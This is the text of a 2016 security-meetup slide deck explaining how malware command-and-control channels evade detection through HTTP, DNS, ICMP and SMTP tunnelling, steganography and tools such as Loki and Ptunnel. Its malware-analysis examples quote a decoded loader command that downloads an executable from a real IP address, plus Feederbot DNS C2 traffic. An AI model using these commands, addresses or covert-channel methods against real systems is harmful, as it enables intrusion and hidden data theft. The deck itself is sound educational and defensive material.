Null 11 june_Malware CNC: Advance Evasion techniques_by Avkash k and dhawal shah

MALWARE COMMAND AND CONTROL: EVASION TACTICS AND TECHNIQUES

Avkash Kathiriya

Information Security Learner

Dhawal Shah

Information Security Learner

AGENDA

• CKC (Cyber Kill Chain) Revision

• What is Command and control?

• What is Malware CnC?

• Why CnC?

• Channels of CnC

• Some Advance CnC

6/11/2016 MALWARE CNC BY AVKASH K & DHAWAL SHAH 2

./Shell> Cyber Kill Chain revision


Our focus on this session will be

Command and Control 6/11/2016 MALWARE CNC BY AVKASH K & DHAWAL SHAH 4

What is Command and Control??


C:\ Command and Control > CnC.txt

Command

Control

&


C:\ Command and Control > CnC.txt

Command

Control

Idea is to give command to control your systems and accomplish your aim


What is Malware CnC?

Compromised system

Command and control server

Command

Co

mm

and

Response

Res

po

nse

Attacker


Why Malware CnC??


Why Malware CnC?

• Receive commands from operator

• Send feedback to operator

• Receive updates and modules from operator

• Evade security

• Intrusion detection

• Antivirus

• Incident response

• Forensics analysis


Evolution of Malware CnC



Evolution of CNC Techniques

Mostly IRC based malwares Rapid evolution of CNC techniques

P2P DNS HTTP

Domain Flux

Tunnelling

Why this Evolution??


Answer is to stay undetected = Need

of covert communication


Covert communication? • Capability to transfer information between two hosts, which are not explicitly allowed to

communicate.

• a mechanism for sending and receiving information data between machines without

alerting any firewalls and IDSs on the network.

• You want to communicate with someone without being observed

• Cryptography/Encryption is not good enough

– You want to hide the fact you are communicating at all

– Best way is to hide the communication in innocuous-looking network traffic or data

– Firewall must let the traffic pass through


Covert communication?

DNS Requests

DNS Reply

Malicious DNS Requests

Malicious DNS Reply

It’s a method of performing malicious

communication with the legitimate and basic

channels which you can not block at perimeter

level e.g. DNS in this case

Internal Network


How Malware CnC happens??


Before that lets first understand basic

User communication channels


Channels of “User” communication

Endpoint

Email Web

Network

User


What about Malware

communication channels??


Just replace User with Malware!


Channels of “Malware” communication

Endpoint

Email Web

Network

Malware


Web

Web Malware

HTTP / 80

HTTPS / 443


Web CnC?

• Direct connection to Internet on port 80

• Which will be blocked in most of the cases

• Identify Proxy being used and divert Web Cnc to proxy

• Proxy needs authentication which malware anyway can get it

• Reverse WWW shell

• Looks ordinary http request on firewall to servers

• Server sends back html resources interpreted as shell command

• Eg. GoToMyPC 6/11/2016 MALWARE CNC BY AVKASH K & DHAWAL SHAH 24

Advance Web CnC?

• Using HTTP GET and POST for communication

• HTTP Tunneling

• Downloading Information in favicon.ico

Extract info using LSB Stagno

Decrypt info using RC4

favicon.ico


Steganography based Covert Channel






Advance Web CnC?

• Youtube as a malware CnC

Attacker

Endpoint


Advance Web CnC? • HTTP Error messages

HTTP/1.1 404 Not Found Date: Mon, 9 Jul 2015 06:13:37 GMT Server: Apache/2 X-Powered-By: PHP/5.3.29 Vary: Accept-Encoding,User-Agent Content-Length: 357 Connection: close Content-Type: text/html; charset=utf8 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /XXX/YYY.php was not found on this server.<P><HR><ADDRESS></ADDRESS></BODY></HTML> ============================================================================= Decoded Value: 1428521523729993#loader http://111.179.39.83/golden3.exe#1428512061754635#rate 60#


Hiding commands in HTTP messages


Email

Email Malware

SMTP


Email CnC?

• It’s pretty simple just use SMTP channel for sending and receiving commands from your controller

Endpoint

Email

Attacker

Sending command through SMTP

Receiving response through SMTP


Evasion techniques seen in this type of communication is use of Power shell

Network

Network Malware

Network Protocol


Network CnC?

Types of covert channel communication @ network layer

• Storage Channels

– Hide data within unused TCP/IP packet header fields

• TCP Flags field, TCP ISN, etc.

• Timing channels

– Modulate system resources in such a way that a receiver can observe and decode it

– Port Knocking, varying packet rates, etc.


Network CnC? • Protocol Tunneling:

– Protocol that carries data from another protocol.

– Example: SSH

– SSH allows to set up a secure connection between two computers.

– Can use this connection for insecure protocols such as ftp.

• Tunnel through any TCP / IP traffic

– Insert data in unused or misused fields in the protocol header of packets, such as:

– IP Identification.

– TCP sequence number.

– TCP acknowledgment number.


Network CnC? • Hiding information on existing protocols such as HTTP,

DNS, and ICMP

• Pros/Cons with each protocol

– HTTP good for large data transfer, but more conspicuous

– DNS not great for data transfer, but good for C&C

– ICMP is good for C&C but is often blocked

• Author of The Rootkit Arsenal

proposes writing your own TCP/IP

stack using MS Windows NDIS

• BitTorrent Tracker protocol

tunneling 6/11/2016 MALWARE CNC BY AVKASH K & DHAWAL SHAH 37

Network CnC? Example: LOKI

Attacker install Loki server (a.k.a. LokiD) on victim. Attacker runs Loki client on his own machine. Loki tunnels attackers commands:

Attacker writes shell commands. Loki client sends out several ICMP packets to victim that

contain part of the commands. Loki server receives ICMP packets and extracts attacker

command. Loki server executes them. Reversely, Loki server wraps responses in ICMP messages,

sends them to the Loki client, which displays them. Port scanners or netstat cannot detect Loki since ICMP does not

use ports. Only traces are the Loki server running as root and ICMP

messages going back and forth. 6/11/2016 MALWARE CNC BY AVKASH K & DHAWAL SHAH 38

Network CnC? • ICMP Covert Tunnels

• Mechanism • Use of Ping request /response

• Tool: Ptunnel ((http://www.cs.uit.no/~daniels/PingTunnel/PingTunnel-0.71.tar.gz))


ICMP Covert Tunnels

• Mechanism of ptunnel tool


ICMP Covert Tunnels

• Wireshark capture of ptunnel tool


DNS Covert Tunnels Mechanism of DNS Covert Channel - Feederbot

Normal: ;QUESTION newcommunitybank.com. IN A ;ANSWER newcommunitybank.com. 86400 IN A 74.54.82.153 =========================================================================== Malicious: ;QUESTION f16e180e9093c237ea31a4ab55ae7fac710a14e4972b30fdf4.google.com. IN ANY ;ANSWER f16e180e9093c237ea31a4ab55ae7fac710a14e4972b30fdf4.google.com. 0 IN TXT "aYpYOb/6L5NRMxDRbwQDrVfPJDw5yogih+zlfj+lQpRDPZE4n1DWB0M/l0J6YDp88Vgm"


DNS Covert Tunnels Mechanism of DNS Covert Channel - Feederbot

• 50-char system-dependent bot ID:

f16e180e9093c237ea31a4ab55ae7fac710a14e4972b30fdf4 • RC4-encrypted bootstrap traffic 0000 8E 68 00 00 0B 00 00 00 17 00 00 00 39 34 2E 32 .h..........94.2 0010 33 2E 36 2E 36 37 00 69 6D 61 67 65 73 2E 6D 6F 3.6.67.images.mo 0020 76 69 65 64 79 65 61 72 2E 6E 65 74 2E 00 3C viedyear.net..< • Contains a referral to the next C2 server node 94.23.6.67


DNS Covert Tunnels • Tool: OzymanDNS


DNS Covert Tunnels • WireShark Capture of OzymanDNS


DNS Covert Tunnels • Packet Capture of OzymanDNS


Endpoint

Endpoint

Malware

USB


Endpoint CnC??

Endpoint CnC??

???


Endpoint CnC??

Endpoint USB

Not actual CnC, but methods of infection and communication was USB in this case.


Conclusion

• CnC is key for any malware to sustain it’s footprint

• Techniques and tactics to evade the CnC channel has evolved from time to time

• Idea is to hide in the mass and exploit the flows in traditional communication channels

• Attackers stay connected with there target and keep on nurturing the malwares planted


References

• Lockheed Martin Cyber Kill Chain

• SANS Institute – Covert channels

• Introduction to malicious code – Erland Jonsson

• Black hat EU15 – Hiding In Plain Sight



• Twitter : @avkashk

• Blog: www.avkashk.wordpress.com or LinkedIn Pulse (Avkash Kathiriya)

• Email : [email protected]

• Twitter:@shahdhawal

• Email: [email protected]

http://www.avkashk.wordpress.com/

mailto:[email protected]

mailto:[email protected]

Technology

Null 11 june_Malware CNC: Advance Evasion techniques_by Avkash k and dhawal shah